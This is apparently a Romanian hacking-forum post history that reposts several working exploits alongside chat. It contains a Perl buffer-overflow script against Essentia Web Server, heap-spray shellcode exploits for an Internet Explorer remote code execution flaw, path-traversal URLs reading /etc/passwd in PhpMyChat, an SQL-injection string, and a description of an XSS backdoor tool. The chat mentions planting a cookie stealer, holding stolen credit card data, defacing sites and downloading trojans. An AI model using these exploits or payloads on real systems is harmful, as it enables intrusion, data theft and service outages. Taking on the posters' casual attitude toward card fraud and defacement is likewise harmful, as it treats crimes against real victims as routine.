escalation666

Essentia Web Server V 2.15 Author:CorryL x0n3-h4ck.org -=[-----------------------------------------------]=- -=[+] Application: Essentia Web Server -=[+] Version: 2.15 -=[+] Vendor's URL: http://www.essencomp.com -=[+] Platform: Windows -=[+] Bug type: Buffer overflow -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: http://www.x0n3-h4ck.org -=[+] Virtual Office: http://www.kasamba.com/CorryL ..::[ Descriprion ]::.. Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers. ..::[ Bug ]::.. This software is affection from a buffer overflow what it would allow an attacker to perform arbitrary code on the system victim. Sending a GET+Ax6800 request, he would succeed to write above the seh point. ..::[ Proof Of Concept ]::.. #!/usr/bin/perl use IO::Socket; use Getopt::Std; getopts('h:', %args); if (defined($args{'h'})) { $host = $args{'h'}; } print STDERR "n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-n"; print STDERR "-=[ Discovered By CorryL [mail]corryl80@gmail.com[/mail] ]=-n"; print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-nn"; if (!defined($host)) { Usage(); } $dos = "A"x6800; print "[+] Connect to $hostn"; $socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80, Proto => 'tcp'); die unless $socket; print "[+] Sending DOS byten"; $data = "GET /$dos rnrn"; ..::[ Workaround ]::.. nothing ..::[ Disclousure Timeline ]::.. [30/10/2006] - Vendor notification [04/11/2006] – No Vendor Response [04/11/2006] - Public disclousure

#se pare ca ti-au raspuns astia la intrebari <html xmlns="http://www.w3.org/1999/xhtml"> <body> <script> var heapSprayToAddress = 0x05050505; var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); </script> <script> var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x3b); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory = spraySlide + payLoadCode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } </script> <object id=target classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5" > </object> <script> var obj = null; obj = document.getElementById('target').object; try { obj.open(new Array(),new Array(),new Array(),new Array(),new Array()); } catch(e) {}; obj.open(new Object(),new Object(),new Object(),new Object(), new Object()); obj.setRequestHeader(new Object(),'......'); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); </script> </body></html> # milw0rm.com [2006-11-10]

pai ar fi normal sa le zici oamenilor cate ceva despre progr inainte sa le downloadeze...cum ar fi faptul ca is cam vechi io n-as lua un progr cu ochii inchisi

un tutorial f bun...keep up the good work!

------------------------- WHAT'>http://ferruh.mavituna.com/xssshell/download/xssshellv039.zip ------------------------- WHAT IS XSS SHELL ? ------------------------- XSS Shell is powerful a XSS backdoor and zombie manager. This concept first presented by "XSS-Proxy - http://xss-proxy.sourceforge.net/". Normally in XSS attacks attacker has one shot, in XSS Shell you can interactively send requests and get responses from victim. you can backdoor the page. You can steal basic auth, you can bypass IP restrictions in administration panels, you can DDoS some systems with a permanent XSS vulnerability etc. Attack possibilities are limited with ideas. Basically this tool demonstrates that you can do more with XSS.

da is cam vechi...cel putin troienii aceia is expirati deja...ping of death...asta se folosea acu 10 ani iar ultima versiune de cain e 2.8.6 etc..

ai gresit locul in care sa postezi amice

zbeng fa-mi un tutorial video despre spart fete glumesc si io..

tutorial'>http://brainbulb.com/php-security-audit-howto.mov tutorial educativ despre securitatea php

http://www.milw0rm.com exploituri,tutoriale,forum,videos http://vxchaos.cjb.net o multime de programe utile de hack www.xfocus.org exploituri,programe,tutoriale,forum www.cirt.net/cgi-bin/passwd.pl parole default in programe si routere www.phenoelit.de/dpl/dpl.html parole default in routere www.windowsecurity.com "securitatea" windows http://ha.ckers.org subiecte interesante despre XSS www.metasploit.com exploituri,acum are si un modul de automated exploits! www.zone-h.org site interesant ce contine date despre defacement-uri zilnice http://koala.ilog.fr/vb/vb-hotlist.html colectie impresionanta cu linkuri despre aproape orice este legat de web! http://neworder.box.sk site cu multe resurse despre hack www.secureroot.com resurse de hack www.antiproxy.com liste de proxy www.iss.net/security_center/advice site-ul firmei de produce BlackIce, are ceva documentatie www.securityfocus.com printre cele mai bune site-uri cu exploituri! www.securiteam.com exploituri ceva mai bine descrise decat in securityfocus www.programmersheaven.com site cu multe resurse despre programare www.w3schools.com site cu tutoriale excelente de programare web http://labmice.techtarget.com tutoriale interesante care te invata sa faci cam orice in windows www.trojanfrance.com troieni... www.sinred.com alti troieni www.darknet.org.uk resurse de hack http://lan.deluxnetwork.com/linux/exploits exploituri pentru linux www.ip-index.de lista de ip-uri pe tzari www.governmentsecurity.org forum de hack...ca sa te inscrii trebuie sa scrii un articol si sa-l submiti pe http://www.datastronghold.com www.datastronghold.com resurse de hack www.indian-hackers.net resurse de hack www.buha.info site nemtzesc destul de interesant http://proxy-list.org/en proxy list http://johnny.ihackstuff.com google hacking! www.security-project.org ceva exploituri www.irongeek.com hacking videos www.databasesecurity.com securitatea bazelor de date www.bright-shadows.net wargames www.infoshackers.com wargames www.ngsec.com wargames www.fatetek.net joculetzul fate www.blind-dice.com wargames http://mod-x.co.uk wargames www.chumley.biz wargames www.tizag.com tutoriale web www.hellboundhackers.org wargames http://hackthissite.org wargames www.pulltheplug.org wargames www.hackquest.com wargames http://news.netcraft.com informatii extrem de utile despre servere www.cgisecurity.com/ securitatea web si a aplicatiilor web in general www.hackerscenter.com resurse de hack http://packetstormsecurity.org http://boxp.sourceforge.net programul BOXP de remote administration pt win http://chasenet.org/home RAT's,rootkits,troieni si alte bunatati http://censorednet.taunet.org RAT's,rootkits,troieni si alte bunatati www.megasecurity.org RAT's,rootkits,troieni si alte bunatati www.nuclearwinter.mirrorz.com RAT's,rootkits,troieni si alte bunatati www.theargon.com/achilles/wordlists/theargonlists dictionare de cuvinte http://sectools.org/ top 100 security tools www.samspade.org servicii gen whois,traceroute,dns,routing explore si multe altele http://www.freerainbowtables.com rainbow tables free http://gdataonline.com online md5 cracker http://passcracking.ru online md5 cracker http://www.plain-text.info lm/md5 password cracker ar fi mai multe..da tre sa gasesc restul de fisiere cu linkuri de prin calc

bine ai venit roackere poate inveti si tu sa spargi ceva cat esti pe aici...macar pahare

si eu is in situatia ta, dar obsesia pt hacking ma face sa continui(to stay alive )...dar adevarul este ca o munca repetitiva te oboseste psihic f mult....o mica vacanta sau un hobby nou..nu cred k ar strica io de exemplu ar cam trebui sa ma apuc de facultate

mda...aseara am pus un cookie stealer...si poate de aceea oricum..era specificat pe prima pagina ca informatiile de pe site is pur educative

cred k astia de pe freepage mi-au inchis site-ul...cred... ******** in ei de ******,erau chestii educative acolo si nicidecum ilegale pusca mea....care ma ajuta sa-mi iau un domeniu...cc-uri am...da is mai vechi si nu stiu daca mai merg.. Multumiri spiridusului http://share.urbanfriends.us/uploads/27b4001d92.rar

merge...thx m8 e bun pt lamerii ca mine care nu au chef sa caute liste de proxi..

******************************************************************************* # Title : PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability # Author : ajann # Dork : phpMyChat 0.14.5 , phpMyChat # Vuln; ******************************************************************************* [File] localization/languages.lib.php3 [/File] [Code,1] languages.lib.php3 Error: .. .... require("./${ChatPath}config/config.lib.php3"); require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.php3"); require("./${ChatPath}lib/clean.lib.php3"); .... .. Key [:] ChatPath=[file] Example: http://target.com/path/localization/languages.lib.php3?ChatPath=../../etc/passwd # ajann,Turkey # ... # Im not Hacker!

a******************************************************************************* # Title : PhpMyChat Plus <= 1.9 Multiple Source Code Disclosure Vulnerabilities # Author : ajann # Dork : phpMyChat plus # Vuln; ******************************************************************************* [Files] avatar.php colorhelp_popup.php color_popup.php index.php index1.php /lib/connected_users.lib.php /lib/index.lib.php logs.php phpMyChat.php3 [/Files] [Code,1] connected_users.lib.php Error: .. .... require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php"); require("./${ChatPath}/lib/clean.lib.php"); .... .. Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] ChatPath=[file] Key [:] L=[file] Key [:] ChatPath=[file] Example: http://target.com/path/avatar.php?ChatPath=../../etc/passwd http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd http://target.com/path/color_popup.php?ChatPath=../../etc/passwd http://target.com/path/index.php?ChatPath=../../etc/passwd http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd http://target.com/path/avatar.php?ChatPath=../../etc/passwd http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd http://target.com/path/logs.php?L=../../etc/passwd http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd # ajann,Turkey # ... # Im not Hacker!

Product: YANS (yet another news system) Link: vuln'>http://sourceforge.net/projects/yans/ vuln code: $resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error()); simple sql injection ' or '1=1 ' or '1=1 -navairum

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN"> <!-- MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit Author: n/a Info: http://blogs.securiteam.com/index.php/archives/721 http://isc.sans.org/diary.php?storyid=1823 http://xforce.iss.net/xforce/alerts/id/239 Found in the wild and was pointed out on securiteam's blog (cheers Gadi Evron!) Changed up the shellcode so it wouldn't be as evil for the viewers, calc.exe is called. /str0ke --> <html xmlns="http://www.w3.org/1999/xhtml"> <body> <object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" > </object> <script> var obj = null; function exploit() { obj = document.getElementById('target').object; try { obj.open(new Array(),new Array(),new Array(),new Array(),new Array()); } catch(e) {}; sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" + "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" + "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" + "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" + "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" + "%uFF57%u63E7%u6C61%u0063"); sz = sh.length * 2; npsz = 0x400000-(sz+0x3b); nps = unescape ("%u0D0D%u0D0D"); while (nps.length*2<npsz) nps+=nps; ihbc = (0x12000000-0x400000)/0x400000; mm = new Array(); for (i=0;i<ihbc;i++) mm = nps+sh; obj.open(new Object(),new Object(),new Object(),new Object(), new Object()); obj.setRequestHeader(new Object(),'......'); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); obj.setRequestHeader(new Object(),0x1234567b); } </script> <body onLoad='exploit()' value='Exploit'> </body></html> # milw0rm.com [2006-11-08]

Kw3[R]Ln ne-ai bagat gloantze si stelutze? e o idee destul de buna...am mai vazut pe un forum de hack ceva asemanator...iar la rank-uri erau soldati...sergenti..capitani etc

welcome m8....and hack the f***** planet!

La multi ani! dai de baut?

animalutzul acela...fara animale daca se poate si cu nickul putin mai orizontal.. oke...cred k si io ma duc la somn..nici nu mai stiu cand am dormit ultima oara

in primul rand un avatar, pt a fi sexi trebuie sa aiba masurile:90-60-90 nu stiu cat reprezinta in pixeli...dar sa fie cam ca al tau +50% din marime nici prea mare...dar nici prea discret

cred k esti un nou ENCODED pe aici culori:verde cu negru; sau negru cu rosu; sa aiba nickul meu...si ceva cu Romanian Security Team...sau RST scheleti,sange,cranii,666, ai inteles ideea.. poti incerca sa faci ceva..care sa pun la avatar..la signature si la deface-uri eventual